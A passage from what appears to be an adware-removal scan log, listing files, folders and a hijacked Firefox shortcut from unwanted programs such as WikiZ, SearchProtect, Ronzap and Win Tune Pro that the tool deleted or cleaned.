    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\b7dcb456af4fbeee_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\ba033ed0f2277902_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\bcf9d63b4e15c596_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\bd48447363dfb226_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\c082d13f1b353621_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\c09edeac3fc0c02e_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\c182cd631f3d45bd_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\c1f67b224d464d4f_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\c2f2ed4609138d4d_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\c49a7d3cbdf68d77_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\c59a935f73b94ea7_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\c60818d7fc25e205_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\c62f2b4df057b6b1_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\c7a5859652c70b90_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\c9920e8e28458a7b_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\cb2c132bd2f0317e_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\cc54e50a69a3167a_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\ce28305fec433f2d_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\ce4292838f9ae991_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\cee27cf6af395615_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\d029fd093a7c3102_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\d33f7069da926dbf_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\d54c9cf0f7f10256_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\d5a43a846dca55f2_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\d805c96b8e9c7d3c_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\d82d498891e9f2f7_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\d89296eeb2024f54_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\dbdf7071e0db497e_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\e0ed08553af7306e_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\e16e444adc22c50a_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\e2a7da21cb00ce7e_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\e2ac40a8d9265dc0_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\e446e1863c05693e_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\e446f090d861f51c_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\e6b36509f1930754_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\e6eb9ba4d282cf2e_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\e9b81a4bc1c997aa_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\eb5f130482c38f3e_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\ebfebe4d5da3f5c7_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\eeabe2a2d09dc1fc_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\f11b32ed936d1090_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\f31c92227662b095_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\f3e4e11b98723bf4_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\f5477bd3c0684b82_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\f5678e51d155feb2_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\f66d466bcebd4d30_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\f7730f3c5717467e_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\f80a7a7d030311f8_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\f9acb8a162713873_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\fb62a0045ee34c90_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\fbe3ca3321be93fc_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\fc71cf2364972ee6_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\fd09f93ff6aaeb29_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\fd3f4b5e3ecf453f_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\fde8941c022477d4_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\ff0e02c0624bf295_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\index -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\index-dir\the-real-index -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Local\WikiZ\Cache\index-dir -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Local\WikiZ\Cache -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\cookies -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\cookies-journal -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\file__0.localstorage -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\file__0.localstorage-journal -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_cdncache-a.akamaihd.net_0.localstorage -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_cdncache-a.akamaihd.net_0.localstorage-journal -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_commons.wikimedia.org_0.localstorage -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_commons.wikimedia.org_0.localstorage-journal -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_d19tqk5t6qcjac.cloudfront.net_0.localstorage -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_d19tqk5t6qcjac.cloudfront.net_0.localstorage-journal -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_nps.pastaleads.com_0.localstorage -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_nps.pastaleads.com_0.localstorage-journal -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_pstatic.bestpriceninja.com_0.localstorage -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_pstatic.bestpriceninja.com_0.localstorage-journal -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_pstatic.eshopcomp.com_0.localstorage -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_pstatic.eshopcomp.com_0.localstorage-journal -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_q2u3z6t7.ssl.hwcdn.net_0.localstorage -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_q2u3z6t7.ssl.hwcdn.net_0.localstorage-journal -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_v3x3b3b5.map2.ssl.hwcdn.net_0.localstorage -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_v3x3b3b5.map2.ssl.hwcdn.net_0.localstorage-journal -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_wiki2.org_0.localstorage -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_wiki2.org_0.localstorage-journal -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Web Data -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Web Data-journal -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Local\WINTUNEPRO -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WINTUNEPRO\WINTUNEPRO.exe_Url_qgsvgdpws442beyezdgboqd2avkpwqs4\1.0.0.0\user.config -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Local\WINTUNEPRO\WINTUNEPRO.exe_Url_qgsvgdpws442beyezdgboqd2avkpwqs4\1.0.0.0 -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Local\WINTUNEPRO\WINTUNEPRO.exe_Url_qgsvgdpws442beyezdgboqd2avkpwqs4 -> Deleted
    [PUP][Folder] C:\ProgramData\CloudPrinter -> Deleted
    [PUP][File] C:\ProgramData\CloudPrinter\CloudPrinter.dat -> Deleted
    [PUP][File] C:\ProgramData\CloudPrinter\CloudPrinter.exe -> Deleted
    [PUP][File] C:\ProgramData\CloudPrinter\Config.xml -> Deleted
    [PUP][Folder] C:\ProgramData\Doubleings -> Deleted
    [PUP][File] C:\ProgramData\Doubleings\ff.HP -> Deleted
    [PUP][File] C:\ProgramData\Doubleings\ff.NT -> Deleted
    [PUP][File] C:\ProgramData\Doubleings\snp.sc -> Deleted
    [PUP][Folder] C:\ProgramData\Logic Handler -> Deleted
    [PUP][File] C:\ProgramData\Logic Handler\Config.json -> Deleted
    [PUP][File] C:\ProgramData\Logic Handler\set.exe -> Deleted
    [PUP][File] C:\ProgramData\Logic Handler\set.exe.config -> Deleted
    [PUP][File] C:\ProgramData\Logic Handler\System.Data.SQLite.dll -> Deleted
    [PUP][File] C:\ProgramData\Logic Handler\System.Data.SQLite.Linq.dll -> Deleted
    [PUP][File] C:\ProgramData\Logic Handler\System.Data.SQLite.xml -> Deleted
    [PUP][File] C:\ProgramData\Logic Handler\X64\SQLite.Interop.dll -> Deleted
    [PUP][Folder] C:\ProgramData\Logic Handler\X64 -> Deleted
    [PUP][File] C:\ProgramData\Logic Handler\X86\SQLite.Interop.dll -> Deleted
    [PUP][Folder] C:\ProgramData\Logic Handler\X86 -> Deleted
    [PUP][File] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk [LNK@] C:\PROGRA~2\MOZILL~1\firefox.exe http://navsmart.info -> Shortcut cleaned
    [PUP][Folder] C:\ProgramData\Ronzap -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\Alphazimair.bin -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\Bigtip.bin -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\conf.config -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\Config.xml -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\IndigoString.dll -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\md.xml -> Deleted
    [PUP][Folder] C:\ProgramData\Ronzap\ondemand -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\Rankfan.dat -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\Ronzap.d.dat -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\Ronzap.dat -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\Ronzap.exe -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\Runnamtone.dat -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\S-la.dll -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\SailQuadtom.bin -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\SanTax.exe -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\SanTax.exe.config -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\Single-Nix.bin -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\Softsing.exe -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\Softsing.exe.config -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\Superstring.bin -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\Techlight.dat -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\TopSailflex.exe -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\TopSailflex.exe.config -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\uninstall.dat -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\Volity.bin -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\Zamdom.bin -> Deleted
    [PUP][Folder] C:\ProgramData\Ronzaps -> Deleted
    [PUP][File] C:\ProgramData\Ronzaps\ff.HP -> Deleted
    [PUP][File] C:\ProgramData\Ronzaps\ff.NT -> Deleted
    [PUP][File] C:\ProgramData\Ronzaps\snp.sc -> Deleted
    [PUP][File] C:\$Recycle.Bin\S-1-5-21-1896049756-2371463424-3974721238-500\$R8B187A.lnk [LNK@] C:\PROGRA~2\WINTUN~1\WINTUN~1.EXE -> Deleted
    [PUP][Folder] C:\Program Files (x86)\4C4C4544-1474199813-5810-8038-B3C04F425431 -> Deleted
    [PUP][File] C:\Program Files (x86)\4C4C4544-1474199813-5810-8038-B3C04F425431\kns1C20.tmp -> Deleted
    [PUP][File] C:\Program Files (x86)\4C4C4544-1474199813-5810-8038-B3C04F425431\kns3E5C.tmp -> Deleted
    [PUP][File] C:\Program Files (x86)\4C4C4544-1474199813-5810-8038-B3C04F425431\kns5B1C.tmp -> Deleted
    [PUP][File] C:\Program Files (x86)\4C4C4544-1474199813-5810-8038-B3C04F425431\knskAF7C.tmpfs -> Deleted
    [PUP][File] C:\Program Files (x86)\4C4C4544-1474199813-5810-8038-B3C04F425431\vnsp73E0.tmp -> Deleted
    [PUP][Folder] C:\Program Files (x86)\mpck -> Deleted
    [PUP][File] C:\Program Files (x86)\mpck\confibg.conf -> Deleted
    [PUP][File] C:\Program Files (x86)\mpck\mobilepcstarterkit_widgetb.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\mpck\o_networkb.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\mpck\unins000b.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\mpck\uninstallerb.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\mpck\wincom_6bYEb.exe -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\EULA.txt -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\Main\bin\uninstall.pun -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect\Main\bin -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\Main\rep\cfi.bin -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\Main\rep\edk.bin -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\Main\rep\pni.bin -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\Main\rep\SystemRepository.dat -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\Main\rep\trn.bin -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect\Main\rep -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect\Main -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64.dll -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect\SearchProtect\bin -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect\SearchProtect\rep -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect\SearchProtect -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect\UI\bin -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Consent\consent.css -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Consent\consent.html -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Consent\consent.js -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Consent\defaults.js -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect\UI\dialogs\Consent -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\Apply-default.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\Apply-onclick.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\Apply-Rollover.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\bg-dia.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\bg-uninstall.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\bg-with-logo.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\bg.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\bgNotif.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\bgSettings.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\bgSettingsDS.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\bgUninstall.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\btnBlue.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\btnClose.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\btnSilver.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\button-bg.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\checkbox.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\checkbox_checked.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\checkbox_def.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\close-win-def.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\close-win-over-click.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\gray-bg.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\hez-def-grey.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\hez-def.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\hez-selected.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\hez.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\icon-win.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\info-icon.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\menu-rollover.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\menu-selected.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\radio-button-def.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\radio-button-selected.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\radio-button.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\radio-button2.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\Settings-icon.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\SP_DialogBG.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\text-field.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\v.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\x.png -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\libs\defaults.js -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\libs\DialogAPI.js -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\libs\dialogUtils.js -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\libs\jquery.1.7.1.min.js -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\libs\json2.min.js -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\libs\main.js -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect\UI\dialogs\libs -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\protection\defaults.js -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\protection\protection.css -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\protection\protection.html -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\protection\protection.js -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect\UI\dialogs\protection -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\protectionDS\defaults.js -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\protectionDS\protectionDS.css -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\protectionDS\protectionDS.html -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\protectionDS\protectionDS.js -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect\UI\dialogs\protectionDS -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\settings\defaults.js -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\settings\settings.css -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\settings\settings.html -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\settings\settings.js -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect\UI\dialogs\settings -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\settings.html -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\style.css -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\uninstall\defaults.js -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\uninstall\uninstall.css -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\uninstall\uninstall.html -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\uninstall\uninstall.js -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect\UI\dialogs\uninstall -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect\UI\dialogs -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect\UI\rep -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect\UI -> Deleted
    [PUP][Folder] C:\Program Files (x86)\Win Tune Pro -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\ActiveBoost.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Autoupdater.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\BootDefrag.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\borlndmm.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\BrokenShortcutsFinder.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\BrokenShortcutsLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\CommonForms.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\ContextMenuManager.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\DiskCleaner.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\DiskCleanerLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\DiskDefrag.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\DiskDefragLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\DiskDoctor.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\DiskDoctorLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\DiskDoctorServer.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\DiskWiper.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\DuplicateFilesFinder.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Export-Template.html -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\FastRegistrySearch.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\FileShredder.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\FileShredderLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\GeneralLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Helper.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\i18n.bpl -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\ImmunizationUSB.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\ImmunizationUSBLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\InetOptimizerLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\internetoptimizer.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\BootDefrag.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\BrokenShortcutsFinder.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\CommonForms.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\ContextMenuManager.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\DiskCleaner.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\DiskDefrag.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\DiskDoctor.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\DiskWiper.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\DuplicateFilesFinder.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\FastRegistrySearch.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\FileShredder.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\General.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\Immunization.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\ImmunizationUSB.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\InetOptimizer.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\Integrator.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\InternetOptimizer.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\LiveUpdate.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\MemoryDefrag.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\RegCleaner.i18n -> Deleted
